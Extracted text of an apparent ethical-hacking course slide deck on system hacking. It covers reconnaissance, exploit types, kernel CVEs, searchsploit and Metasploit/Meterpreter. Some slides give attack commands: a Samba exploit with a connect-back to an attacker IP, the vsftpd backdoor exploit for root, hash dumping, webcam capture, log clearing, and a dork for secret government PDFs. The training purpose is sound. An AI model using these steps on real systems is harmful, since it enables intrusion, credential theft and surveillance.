System Hacking

@mmar

Hassan 1
PHASES OF ETHICAL HACKING

2
 FOOTPRINTING
Identify Target
Identify IP Network topology
DNS, Subdomains, whois, web
Identify ASN (https://ipinfo.io/)
Identify Servers if possible
Network Information technologies
Identify Admins (whois)
https://lookup.icann.org/en/lookup
Gather Org Information
Gather Passwords
Gather Employees Emails, phone nos
Haveibeenpawned
(harverster) (hunter.io),Linkedin
breadcheddirectory
Gather documents
(google dorks)
army secret site:*.gov.in filetype:pdf

Scanning &
Enumeration
3
 SCANNING AND ENUMERATION
Identify Live hosts
Ping sweep –sn TCP Ports
netdiscover Udp Ports
Identify Open Ports Scan for all ports

Identify services
System Enumerate
Detect service Version -sV
Collect usernames, system names,
Emails etc
Web Enumeration
Subdomains
Vhosts
DNS

Hack it
4
 System Hacking

 System hacking is an attempt to break into a computer system that you normally
have no (or limited) access to
 The goals of system hacking are typically to:
 Access confidential data or restricted services
 Obtain a password or credential that can be used elsewhere
 Use the system as a “stepping stone” for further attacks into the network
 Disrupt the system’s functionality

Hassan 5
 System Hacking - Stages

1. Gain access
 Password cracking
 OS vulnerabilities
 Service and application vulnerabilities
 Social Engineering
 Physical access
2. Escalate privilege
 Kernel or service flaws
 Social Engineering

Hassan 6
 System Hacking - Stages

3. Execute applications 5. Cover tracks

 Pivot  Remove artefacts
 Plant RATs  Clear logs and history
 Run payloads
 Exfiltrate data
4. Hide files
 Leave malicious files on the system
 Steganography
 Alternative Data Streams
Hassan 7
 Exploits and Payloads

 An exploit takes advantage of a weakness

 It gets you into the system
 A payload is the code that is executed through the exploit
 It does the real damage

Hassan 8
 Bind Shell Payloads
 The attacker sends an exploit to the victim
 The payload opens a listening back door on the victim machine
 The attacker then connects to that back door
 The attacker must be able to get past the victim’s firewall to connect to the back
door

Hassan 9
 Reverse Shell Payloads
 The attacker sends an exploit to the victim
 The payload makes a client connection from the victim’s machine back to the attacker
 The victim is making an outbound connection past their firewall
 The attacker need not contend with the victim’s firewall to use the connection
 The attacker must be prepared with a “handler” that listens for incoming connections
 The attacker’s firewall must permit a connection to the incoming port

Hassan 10
 Exploit Chaining
 Exploit Chaining is the act of using multiple exploits to form a larger attack
 Success may depend on all exploits doing their part
 Distributed nature makes them complex and difficult to defend against
 Some chained exploits must run consecutively
 Some run in parallel

Hassan 11
 Exploit Chaining

Social Standard User MS_17_010 Administrator

Engineering Account Eternal Blue prompt PWN!
Attack

Malicious UAC Kitrap0d Administrator

Adobe PDF VNC Injection Local Priv Esc prompt PWN!

Tamper Plant Kali Use PI to

Distract a with Break into Raspberry launch
Guard Alarm Office PI in internal PWN!
System network attacks

Hassan 12
 Common Exploit Types

Category Description
Remote code Any condition that allows attackers to execute arbitrary code
execution
Buffer or heap A programming error that allows attackers to overwrite allocated memory
overflow addresses with malicious code

Denial of service Any condition that allows attackers to use resources so that
legitimate requests can’t be served

Hassan 13
 Common Exploit Types

Category Description
Privilege Any condition that allows attackers to gain elevated access to a
escalation compromised system
Often performed through kernel exploits
Information Any condition that allows attackers to gain access to protected
disclosure information
Security feature A software weakness that allows attackers to circumvent policies, filters,
bypass input validation, or other security safeguards

Directory Any condition that allows attackers to access restricted areas of a file
traversal system

Hassan 14
 Rings of Privilege

 Intel CPU architecture

 Started with i386
 Hardware enforces privilege levels
and process separation

Hassan 15
 Kernal Exploits
 The kernel is the core part of the Windows or Linux operating system
 It manages memory, schedules processing threads, and manages device I/O
 It runs in Ring 0 and has priority over all other processes
 Exploits that attack the kernel escalate privileges and destabilize the entire system

Hassan 16
 Kernal Exploits Suggester
 Kernel exploit suggesters exist for both Windows and Linux
 Watson (Windows)
 A .NET tool designed to enumerate missing KBs and suggest exploits for Privilege
Escalation vulnerabilities
 https://github.com/rasta-mouse/Watson
 Linux Exploit Suggester
 Designed to assist in detecting security deficiencies for given Linux kernel/Linux-
based machine
 https://github.com/mzet-/linux-exploit-suggester

Hassan 17
 Recent Windows Kernal Exploits
 CVE-2019-0836 LUAFV PostLuafvPostReadWrite SECTION_OBJECT_POINTERS
Race Condition Windows 10 1809
 CVE-2019-0841 Microsoft Windows 10 < build 17763 - AppXSvc Hard Link Privilege
Escalation
 CVE-2020-0796 SMBGhost (Windows 10 1903/1909) Remote Code Execution
 CVE 2019-1458 Wizard Opium (Windows) Local Privilege Escalation
 CVE 2019-1125 Windows Kernel Information Disclosure
 CVE 2019-0708 Windows 7 (x86) - 'BlueKeep' Remote Desktop Protocol (RDP)
Remote Windows Kernel Use After Free

Hassan 18
 Recent Linux Kernal Exploits
 CVE-2022-0847 Linux Kernel 5.8 < 5.16.11 - Local Privilege Escalation (DirtyPipe)
 CVE-2020-12352, 12351 Linux Kernel 5.4 - 'BleedingTooth' Bluetooth Zero-Click
Remote Code Execution
 CVE-2019-13272 Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege
Escalation
 CVE-2019-19241 Linux 5.3 - Privilege Escalation via io_uring Offload of sendmsg()
onto Kernel Thread with Kernel Creds

Many more are available on exploit-db.com!

Hassan 19
 SPECTRE AND MELTDOWN
 “Catastrophic” kernel exploits
 CVE - 2017-5754, CVE-2017-5753, CVE-2017-5754
 Impacts over 2800 vulnerable CPU types (Intel, IBM PowerPC, AMD, ARM)
 They break a fundamental assumption in operating system security
 That an application running in user space cannot access kernel memory
 Meltdown causes out-of-order execution on the CPU
 Can leak kernel memory into user mode long enough for it to be captured by a
side-channel cache attack
 Spectre
 Causes a CPU to speculatively execute a malicious code’s path
 The malicious path is rolled back but metadata is left in a cache that could also be
captured by a side-channel attack
 In the cloud, an application in one VM could access the memory of another VM
 An attacker could rent an instance on a public cloud
 Collect information from other virtual machines on the same server
Hassan 20
 Manual Exploitation

searchsploit samba 2.2

Hassan 21
 Manual Exploitation

cp /usr/share/exploitdb/exploits/multiple/remote/10.c gcc -o samba exploit.c ~/exploit.c

chmod 755 samba
./samba -h
./samba -b 0 -c <attacker IP> <target IP>

 Many exploits are available only in their source code format

 Text file that must be compiled into an executable
 Download or copy the uncompiled exploit to the current directory
 Research how to use the exploit
 Read the source code
 Find info on Exploit-db.com
 Ask Uncle Google

Hassan 22
 Manual Exploitation
Compiling
Exploits

 If the exploit requires a library, then install it. For example:

 sudo apt-get install libssl-dev
 Compile the source code
 Use the appropriate GNU C compiler based on the extension (gcc for .c, g++ for .cpp)
 Syntax: gcc -o <output executable> <source file>
 You may need to point to the present directory so gcc/gpp can find the source
 gcc -o myexploit ./coolsploit.c
 g++ -o mybestsploit ./verycool.cpp
Hassan 23
 Manual Exploitation
Running
Exploits

 You may need to give yourself permission to run the script or executable:
 chmod 777 ./pwn.py
 chmod 777 ./mysploit
 Run a script from its interpreter
 python ./pwn.py 192.168.182.130
 Execute the program
 ./mysploit 192.168.182.130

 Note: If the directory you are running the exploit from is not in your path environment
variable, you can indicate the current directory with ./

Hassan 24
 Scan to Pwn - Example

1. In Kali Linux,open a terminal

2. Update your copy of the Exploit-db database
searchsploit -u
3. Ping sweep to identify possible targets
nmap -sP 192.168.182.1-255
4. Metasploitable is a possible target. Use nmap to conduct port scan and
identify service versions
nmap -A 192.168.182.130
5. Nmap identifies the FTP service version as vsFTPd 2.3.4
6. Search Exploit-db.com for more information.Search returns a Python script:
vsftpd 2.3.4 - Backdoor Command Execution Python script exploit

Hassan 25
 Scan to Pwn - Example

7. See if you have an exploit for vsFTPd

searchsploit vsftpd

8. Searchsploit has the Python script at /unix/remote/49757.py

9. Get more information as well as the path to the exploit
searchsploit -p 49757

10. The path to the exploit is

/usr/share/exploitdb/exploits/unix/remote/49757.py
11. Highlight and copy the path to the clipboard
12. Copy the exploit to your home page. You can rename the copy as you wish:cp
/usr/share/exploitdb/exploits/unix/remote/49757.py pwn.py

Hassan 26
 Scan to Pwn - Example

13. See if the exploit has built-in help

python ./pwn.py -h

14. The exploit only needs the address of the target

python ./pwn.py <target>

15. Run the exploit with the required argument

python ./pwn.py 192.168.182.130

16. You now have root access

 You don’t see a prompt,but you can run commands
ls whoami pwd

Hassan 27
 Metasploit Framework
 Metasploit Framework (MSF) has long been a tool used by security professionals to
test networks and systems
 It was created by HD Moore in 2003 as a penetration testing tool
 Written mostly in Ruby. Modules are organized into categories
Module Categor y Description
Auxiliary scanners, crawlers and fuzzers
Exploits Attack (kick the door in)
Payloads Pwn (toss in the grenade)
Encoders Evade detection,change bad exploit characters
Evasion Generate your own evasive payloads
NOPS Advanced buffer overflows
Post Escalate privilege,additional tasks
Hassan 28
 Metasploit Framework
 Use an exploit and payload together to attack a target
 The exploit gets you into the victim
 The payload performs the actual task you want to accomplish

Hassan 29
 Metasploit Framework
 Metasploit Framework is already installed in Kali Linux
 You’ll want to update/upgrade Kali to get the latest Metasploit modules:
 sudo apt update && sudo apt upgrade
 If you installed Metasploit yourself in another Linux distro, you can update it manually
at a terminal prompt:
 msfupdate

Hassan 30
 Metasploit Framework

 From the Kali desktop click Applications  Exploitation Tools 

Metasploit Framework

Hassan 31
 Metasploit Framework
 Metasploit has its own command prompt that is NOT case sensitive
 It can run a number of basic BASH/zsh commands as well as its own commands
 At the Metasploit prompt, you can search for exploits, payloads, and other modules
 search [<options>] [<keyword>:<value>]
 Prepending a value with '-' will exclude any matching results
 If no options or keywords are provided, cached results are displayed

Hassan 32
 Metasploit Framework

Module Path

 The module path is the physical path to the module within the metasploit-framework
directory

Hassan 33
Selecting Exploits

Hassan 34
 Exploits and Payload Options
 Exploits and payloads each have their own set of options
 Some exploits will automatically choose a payload that you can change if desired
 Some options have default values that you can change if desired
 Some options require input from you
 Typical options include:
 RHOSTS (target IP)
 RPORT (target port)
 LHOST (listener host/handler)
 LPORT (listener port)
 SMBDomain (the domain or computer name - the default is “.” )
 SMBUser (the user account you are using for the exploit)
 SMBPass (the user’s password)
Hassan 35
 Reverse Payload LHOST Option
 You can configure a reverse payload to connect back to a handler on:
 the attacker
 another machine
• Convenient when you want to dedicate a machine to wait for reverse
connections Target
192.168.1.5
Attacker
192.168.1.100

Handler
192.168.1.200

Hassan 36
Using Exploits

Hassan 37
Using Exploits

Hassan 38
Using Exploits

Hassan 39
 Using Exploits
 Show options one last time to make sure you didn’t miss anything
 show options
 Then launch the exploit with either command:
 Exploit or run

Hassan 40
 Multiple Metasploit Sessions
 Metasploit allows you to run multiple attacks on different targets simultaneously
 An exploit will typically move you into a session as soon as you get it
 You may wish to back out of that session
 Leave it running in the background
 Start another exploit against a different target meterpreter > background
 You can toggle between sessions
 meterpreter > sessions <session ID>
 You can also send a command to multiple sessions at once
 sessions -C screenshot -i 2,3

Hassan 41
 Multiple Metasploit Sessions
sessions List all sessions you have acquired
sessions -h Get help with the sessions command
sessions -l List active sessions
sessions -i <session ID> Switch to a different session
Example - switch to session # 2: sessions -i 2
sessions -c <command> -i Run an OS shell command on multiple sessions at once
<session ID, session ID,…> Targets must have the same/compatible OS
Example: sessions -c "net user" -i 2,3
sessions -C <command> -i Run a meterpreter command against multiple sessions at once
<session ID, session ID, …> Example: sessions -C screenshot -i 2,3
sessions -k <session ID> Kill a session
Example – kill session # 2: sessions –k 2
sessions –K Kill all sessions
sessions –u <session ID> Upgrade a shell to meterpreter
Use when an exploit only gives you a shell

Hassan 42
 Meterpreter Commands Categories
 Core commands
 File system commands
 Networking commands
 System commands
 User Interface commands
 Webcam commands
 Audio output commands
 Elevate commands
 Password database commands
 Timestomp commands (manipulate file timestamps)

Hassan 43
 Meterpreter Commands Categories
 help
 search
 The backslash is an escape character
 Use double backslashes when giving theWindows path
 Use a backslash in front of a space in the path

search -d c:\\documents\ and\ settings\\administrator\\desktop\\

 upload
 upload <file> <destination>

 download
 download <file> <path to save>
 To recursively download an entire directory,use the download -r command

Hassan 44
 Meterpreter Commands Categories
 execute
 Run a command on the victim
 shell
 Drop to the victim’s command prompt
 webcam_list
 List webcams
 webcam_snap
 Tell a webcam to take a picture
 ps
 Use to find a process ID (PID) or parent process ID (PPID)
 migrate
 Use to migrate meterpreter to another running process on the victim
 You will need the target PID

Hassan 45
 Meterpreter Commands Categories
 hashdump
 The output of each line is in the following format:Username:SID:LM hash:NTLM hash:::

 run credcollect
 Runs a script that dumps hashes as well as collects system tokens

 getuid
 Display the user that the Meterpreter server is running as on the target

 getsystem
 Attempt to elevate your current privilege to SYSTEM (higher than admin!)

 sysinfo
 Get information about the exploited target

Hassan 46
 Metasploit Post Modules
 Some meterpreter commands might not execute well
 Look for POST modules you can also run to do the desired task
 Background your meterpreter session first before you search POST modules
 After choosing a POST module, set the meterpreter session ID in its options

Hassan 47
 Metasploit Post Modules
 Meterpreter command hashdump isn’t working
 Instead use post/windows/gather/smart_hashdump module
 In this example meterpreter session is 5; smart_hashdump module is 13
Background
Sessions
search post hashdump
use 13
set session 5 run

Hassan 48
 Metasploit Process Migration
 Meterpreter runs in the exploited process
 You can move meterpreter to a different (more stable) running process
 Explorer.exe is an excellent choice since it will always be running so long as there
is a logged on user
 You can also try migrating to system processes such as winlogon or services
 You will need to identify the process ID (PID) or its name
 In meterpreter, run the ps command to find a process, its name, and the PID
 Then run either command:
 migrate -N <process name>
 migrate <process ID>
Hassan 49
 MSF Venom
 Msfvenom allows you to generate payloads
 Msfvenom will allow you to access all payloads available in the Metasploit framework.
Msfvenom allows you to create payloads in many different formats (PHP, exe, dll, elf,
etc.) and for many different target systems (Apple, Windows, Android, Linux, etc.)

Hassan 50
 MSF Handlers
 Similar to exploits using a reverse shell, you will need to be able to accept incoming
connections generated by the MSFvenom payload. When using an exploit module, this
part is automatically handled by the exploit module
 We can use Multi Handler to receive the incoming connection. The module can be
used with the use exploit/multi/handler command
 Multi handler supports all Metasploit payloads and can be used for Meterpreter as well
as regular shells

Hassan 51
 MSF Handlers
 For example, to use the module, we will need to set the payload value
(php/reverse_php in this case), the LHOST, and LPORT values

Hassan 52
 MSF Aux Modules
 Metasploit has a number of modules to scan open ports on the target system and
network. You can list potential port scanning modules available using the search
portscan command

Hassan 53
 MSF Aux Modules
 Metasploit allows you to quickly identify some critical vulnerabilities with in built
vulnerability scanners that could be considered as “low hanging fruit”.

Hassan 54
Thanks

Hassan 5555